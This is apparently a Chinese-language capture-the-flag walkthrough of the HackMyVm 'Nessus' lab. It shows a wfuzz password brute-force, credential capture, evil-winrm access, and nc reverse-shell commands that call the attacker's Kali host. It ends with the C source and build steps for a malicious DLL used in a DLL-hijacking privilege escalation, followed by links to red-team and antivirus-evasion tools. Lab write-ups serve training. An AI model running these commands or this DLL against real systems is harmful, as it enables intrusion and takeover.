HackMyVm-Nessus ：简单 6.1 端口扫描6.2 漏洞扫描nmap -sS -p 135,139,445,5985,8834 192.168.53.238 -T4 -A --script=vuln在访问这个端口的时候，提示你需要使用https访问那就使用https访问，没有账号密码，登录不进去6.3 查看smb服务尝试免密连接smb服务，可以正常连接，并且里面有两个PDF看看什么内容My Basic Network Scan_hwhm7q.pdfWeb Application Tests_f6jg9t.pdf发现作者信息，joseexiftool [pdf]6.4 爆破Nessus后台前面已经发现了，smb是可以免密登录的，那么现在就只有nessus爆破了，来到nessus登录界面，抓包，添加爆破的payload根据这些数据包，使用wfuzz进行爆破因为要用到kali中的rockyou.txt字典（也可以将rockyou.txt传到本机windows进行爆破）wfuzz -c -z file,/usr/share/wordlists/rockyou.txt \ -X POST \ -H "Host: 192.168.53.238:8834" \ -H "X-Api-Token: 4c746180-a399-4abd-a9a0-49055fac236f" \ -H "Content-Type: application/json" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" \ -H "Origin: https://192.168.53.238:8834" \ -H "Referer: https://192.168.53.238:8834/" \ -d '{"username":"jose","password":"FUZZ"}' \ --hc 401,403 \ -f result.txt,raw \ https://192.168.53.238:8834/session得到密码，tequiero当前nessus版本为10.7.3，应该是比较新的，没有什么漏洞，或者漏洞没有公开（去网上搜了下，可能有一个本地提权漏洞，但是exp没有公开）6.5 盗取认证信息来到代理界面，尝试查看源码查看密码，查看失败那么就利用代理，发送数据包到kali中，看看有没有密码出现，kali记得开nckali得到的信息，没有密码信息一个一个切换，当我切换到basic这个内容nc接收到的数据包如下，发现一段密文得到认证信息，解密后就是账号密码nesus:Z#JuXH$ph-;v@,X&mV)得到账号密码，和之前那个靶机一样，需要修改登录的密码，这个已经过期了nxc smb 192.168.53.238 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'6.6 近源攻击！！按两次Esc键，来到选择账户界面修改你的账号密码修改密码为123456，登录smb，发现什么也没有6.7 远程连接那就来到5985端口，执行命令成功！evil-winrm -i 192.168.53.238 -u nesus -p 1234566.8 反弹shell这里我尝试了各种MSF的木马，都被杀软给杀了，无意间使用nc的时候就不会被杀，使用nc进行反弹shell（kali记得开监听）./nc.exe 192.168.53.51 1234 -e cmd6.9 提权6.9.1 local_exploit_suggester提权打开MSF（这一步其实很多余，这样子是扫不出来的，基本只有后渗透模块meterperter才能使用）MSFconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload（nc反弹的是基础shell，非meterpreter） # 目标是Windows，接收nc命令反弹的shell： set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.53.51 # 攻击机IP（与nc反弹目标一致） set LPORT 1234 # 监听端口（与nc反弹端口一致） run -j # 启动监听，保持后台执行 use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块 set session 3 # 设置反弹成功的会话id为3，使用 sessions 即可查看所有的会话id6.9.2 PrivescCheck提权内网常见的提权和信息收集文章参考：https://www.cnblogs.com/Hekeats-L/p/16879325.html工具链接：https://github.com/itm4n/PrivescCheck/releases/tag/2025.10.06-1upload PrivescCheck.ps1 Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1 Invoke-PrivescCheck有一个高危的提权漏洞看看文件信息每一项描述如下（如果您精通Linux提权的话，将会和Linux进行类比）Name服务的 “内部名字”（操作服务时用，比如启停服务）nginx 服务的内部名就是 “nginx”（用systemctl restart nginx时的名字）后续想重启这个服务，要用到这个名字DisplayName服务的 “显示名字”（在 Windows 服务面板里看到的名字，方便你找到它）nginx 在 Linux 里的显示名可能是 “nginx - high performance web server”确认你改的是对的服务，别改错了User这个服务是用 “LocalSystem” 权限运行的（Windows 里的最高权限，比管理员还高）类比 Linux 里用 “root” 用户运行的 nginx 服务提权的关键！服务跑在最高权限，改了它的程序就能拿最高权限ImagePath服务启动时会执行的 “核心 exe 文件路径”（就是你要替换的那个文件）类比 Linux 里 nginx 守护进程的路径/usr/sbin/nginx目标文件！把这个 exe 换成恶意程序就行StartMode服务是 “自动启动” 的（开机或服务崩溃后会自己重启）类比 Linux 里systemctl enable nginx（开机自启）替换文件后不用手动触发，重启机器 / 服务就会执行恶意程序Type服务是 “独立进程”（启动时只跑这个 exe，不依赖其他程序）类比 Linux 里 nginx 是独立进程（`ps auxgrep nginx` 能看到单独的进程）RegistryKey/Path服务在 Windows 注册表中的配置路径（不用管，提权用不上）类比 Linux 里 nginx 的配置文件路径/etc/nginx/nginx.conf（但这里是注册表，不用管）次要信息，不用关注Status服务当前状态（空，因为前面警告没查到）类比 Linux 里systemctl status nginx报错，看不到 “active” 还是 “inactive”后续手动用命令查就行，不影响提权UserCanStart你当前用户 “不能手动启动这个服务”类比 Linux 里普通用户不能systemctl start nginx没关系，能重启机器或杀进程间接触发UserCanStop你当前用户 “不能手动停止这个服务”类比 Linux 里普通用户不能systemctl stop nginx没关系，用taskkill（类比 Linux 的 kill）杀进程就行ModifiablePath你能修改的文件路径 —— 就是上面说的那个要替换的 exe（nessus-service.exe）类比 Linux 里ls -l /usr/sbin/nginx显示你有 w 权限，能改这个文件明确告诉你 “要改哪个文件”IdentityReference拥有这个修改权限的用户 —— 就是你当前的 “NESSUS\nesus” 用户类比 Linux 里ls -l /usr/sbin/nginx显示 “ubuntu rwx”（你的用户有权限）确认 “是你自己有这个改文件的权限”Permissions你的权限是 “完全控制”（能改、能删、能替换这个 exe，想干嘛干嘛）类比 Linux 里的 “rwx” 权限，尤其是 “w”（写入）权限 总结一下：你当前的nesus用户，能完全控制一个叫Tenable Nessus的服务 —— 这个服务是用 Windows 最高权限（LocalSystem，类比 Linux root）运行的，启动时会执行nessus-service.exe。而且这个服务是开机自动启动的，你只要把nessus-service.exe换成恶意程序，下次服务启动（重启机器 / 杀进程），恶意程序就会用最高权限跑起来 —— 和你在 Linux 里替换 root 运行的/usr/sbin/nginx、重启后拿 root 权限，完全一样。cd "C:\Program Files\Tenable\Nessus\" dir原来是可以利用直接替换这个应用程序进行提权，但是这里，杀软会查杀掉我们的MSF马，要么你有能力过这个windows defender当然也可以使用nc，但是nc是一个应用程序，需要选用参数，而不是直接执行，就能上线MSF或者kali的nc的，需要使用批处理也就是.bat# kali echo "C:\Users\nesus\Documents\nc.exe 192.168.53.51 4444 -e cmd.exe" > nessus-service.bat # evil-winrm upload nessus-service.bat "C:\Program Files\Tenable\Nessus\nessus-service.exe"这里漏掉了一个关键（你需要杀死它的进程，让服务自动重启）我们使用Stop-Process强制重启服务的时候报了一个错误：拒绝访问（Access is denied）Stop-Process -Id (Get-Process -Name "nessus-service").Id -Force遇到 “Access denied” 是因为nessus-service进程以LocalSystem权限运行，低权限用户无法直接杀死。如何解决？尝试更底层的taskkill！taskkill是 Windows 原生的进程杀死命令，权限处理和Stop-Process不同，先试一次：taskkill /f /im nessus-service.exe照样也是拒绝访问。重启计算机也没用，那么就换一种方法，DLL劫持！DLL劫持！6.10 DLL劫持6.10.1 什么是 DLL 劫持？（类比 Linux）1. 基础定义DLL（Dynamic Link Library，动态链接库）是 Windows 里的 “共享代码文件”，类似 Linux 的.so文件（Shared Object）。很多程序（比如服务、软件）运行时会主动加载依赖的 DLL 文件（比如调用 DLL 里的函数）。DLL 劫持的本质是：攻击者替换 / 插入一个恶意 DLL 文件，让高权限运行的目标程序（比如 LocalSystem 权限的服务）“误加载” 我们的恶意 DLL，从而执行恶意代码（相当于 Linux 里用LD_PRELOAD强制 root 进程加载恶意.so文件）。2. 类比 Linux 场景你在 Linux 里想提权时，可能会用LD_PRELOAD=/tmp/malicious.so /usr/bin/root_program，强制 root 运行的root_program加载你的恶意.so文件，.so里的代码会以 root 权限执行。Windows DLL 劫持和这个逻辑完全一样：让 LocalSystem 权限的Tenable Nessus服务，加载你写的恶意legacy.dll，DLL 里的代码会以 LocalSystem 权限执行。6.10.2 DLL 劫持提权过程1、查权限icacls "C:\Program Files\Tenable\Nessus\*.dll" 是 Windows 中用来查看指定目录下所有dll文件 / 子目录权限的命令，作用类似 Linux 里的 ls -l /path/*.dll（查看某个目录下所有文件的权限详情）。icacls "C:\Program Files\Tenable\Nessus\*.dll"为什么要使用这条命令？确认你当前用户（nesus）对服务依赖的 DLL 文件（比如legacy.dll）有写入 / 替换权限。从之前的权限结果看，nesus对这些 DLL 有F（完全控制）权限 —— 相当于 Linux 里用ls -l /usr/lib/root_program_dep.so看到普通用户有w权限，满足 “能替换文件” 的前提。权限表，和linux差不多，这里多了个修改还有删除，linux中只有rwx符号权限说明对应操作F完全控制读取、写入、执行、删除、修改属性M修改写入、删除（需配合F）RX读取和执行查看内容、运行程序R只读查看内容W写入修改内容（需目录权限）D删除删除文件或子目录2、编写恶意 DLL 代码在网上找到一个脚本，这是一个基础的恶意 DLL，核心逻辑在DLLMain函数里：/* DLL hijacking example author: @cocomelonc */ #include BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // 程序加载DLL时触发（关键分支） system("cmd.exe /k net localgroup administrators nesus /add"); // 恶意命令：把nesus加入管理员组 break; case DLL_PROCESS_DETACH: // 其他分支（进程卸载、线程创建/销毁）暂不用管 break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; }关键解释：DLLMain是 DLL 的 “入口函数”，类似 Linux.so文件的_init函数 —— 目标程序（Nessus 服务）加载 DLL 时，会自动调用DLLMain，并触发DLL_PROCESS_ATTACH分支。恶意命令net localgroup administrators nesus /add：把nesus加入管理员组（这里是示例，实际可写反弹 shell 命令，拿到 LocalSystem 权限）。Linux 类比：写一个恶意.so文件，在_init函数里执行system("usermod -aG sudo ubuntu")，让 root 进程加载时把普通用户加入 sudo 组。3、编译恶意 DLL（生成 Windows 能识别的格式）在 kali 里用mingw编译 C 代码，生成 Windows 可加载的 DLL 文件：# kali x86_64-w64-mingw32-gcc exp.c -shared -o legacy.dllx86_64-w64-mingw32-gcc：Windows 交叉编译器（生成 64 位 Windows 程序，需和目标系统位数匹配）；-shared：生成 “共享库”（即 DLL 文件，对应 Linux 的.so）；-o legacy.dll：输出文件名为legacy.dll（必须和目标服务依赖的 DLL 同名，否则服务找不到）。4、备份原 DLL + 上传替换（避免服务崩溃 + 植入恶意文件）# evil-winrm cd "C:\Program Files\Tenable\Nessus" mv legacy.dll legacy_beifen.dll # 备份文件 upload legacy.dll # 上传你kali编译的dll文件备份原 DLL：legacy.dll是 Nessus 服务的依赖文件，直接删除会导致服务崩溃，备份后可回滚（类似 Linux 里cp /usr/lib/libnginx_dep.so /tmp/）；上传替换：让服务下次加载legacy.dll时，加载的是你的恶意 DLL（类似 Linux 里cp /tmp/malicious.so /usr/lib/libnginx_dep.so）。5、重启虚拟机（触发服务加载恶意 DLL）最后重启目标机，Nessus 服务会随系统开机启动 —— 启动时会自动加载依赖的legacy.dll（此时已被替换成恶意 DLL）：服务以LocalSystem（Windows 最高权限，类比 Linux root）启动；加载恶意legacy.dll，触发DLLMain的DLL_PROCESS_ATTACH分支；执行net localgroup administrators nesus /add，把nesus加入管理员组（实际可改为反弹 shell 命令，拿到 SYSTEM 权限）；重启后，nesus已拥有管理员权限，提权成功。6.10.3 DLL 劫持的核心利用条件和 Linux.so劫持的条件类似，DLL 劫持能成功，必须同时满足以下 4 个条件（你的场景全部满足）：1. 目标程序（服务 / 软件）以高权限运行比如你的Tenable Nessus服务以LocalSystem权限运行（类比 Linux 里 root 运行的nginx）。若目标程序是普通用户权限，即使劫持成功，也只能拿到普通权限，无法提权。2. 你对目标程序加载的DLL 文件有写入 / 替换权限你的icacls结果显示，nesus对legacy.dll有F（完全控制）权限，能备份、删除、替换该 DLL（类比 Linux 里普通用户对/usr/lib/libnginx_dep.so有w权限）。若只有只读权限（RX），无法替换 DLL，劫持失败。3. 目标程序会主动加载该 DLL 文件legacy.dll是Tenable Nessus服务的 “依赖 DLL”—— 服务启动时必须加载它才能正常运行（类比 Linux 里nginx必须加载libnginx_dep.so）。若目标程序不加载该 DLL，即使替换了也没用（比如替换一个无关的 DLL 文件）。4. 恶意 DLL 能被目标程序成功加载恶意 DLL 的格式要正确（比如 32 位 / 64 位和目标程序匹配，你用x86_64编译对应 64 位系统）；若目标程序需要 DLL 导出特定函数（比如LoadLibrary调用的函数），恶意 DLL 需包含这些导出函数（你的示例是基础DLLMain，满足简单加载需求）。类比 Linux 里恶意.so需符合 ELF 格式，否则无法被nginx加载。6.10.4 总结找到一个 “高权限运行、且依赖的 DLL 你能替换” 的程序（比如服务），用恶意 DLL 替换原 DLL，让高权限程序执行恶意代码，从而拿到高权限。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透